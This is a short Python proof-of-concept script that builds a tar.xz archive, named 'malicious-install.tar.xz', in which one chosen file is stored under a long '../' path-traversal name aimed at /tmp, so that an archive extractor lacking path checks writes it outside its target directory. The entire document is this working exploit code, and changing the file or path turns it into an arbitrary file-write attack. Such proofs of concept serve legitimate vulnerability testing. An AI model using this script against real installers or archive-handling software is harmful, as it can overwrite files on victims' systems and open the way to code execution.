import os
import tarfile

def create_malicious_tar(folder_path, output_tar, malicious_file, traversal_path):
    with tarfile.open(output_tar, "w:xz") as tf:
        for root, _, files in os.walk(folder_path):
            for file in files:
                file_path = os.path.join(root, file)
                if file == malicious_file:
                    arcname = os.path.join(traversal_path, malicious_file)
                    tf.add(file_path, arcname=arcname)
                else:
                    arcname = os.path.relpath(file_path, folder_path)
                    tf.add(file_path, arcname=arcname)
    print(f"Malicious tar.xz created: {output_tar}")

folder_path = "tarcontent"
output_tar = "malicious-install.tar.xz"
malicious_file = "hello.txt"
traversal_path = "../../../../../../../../../../../tmp/"

create_malicious_tar(folder_path, output_tar, malicious_file, traversal_path)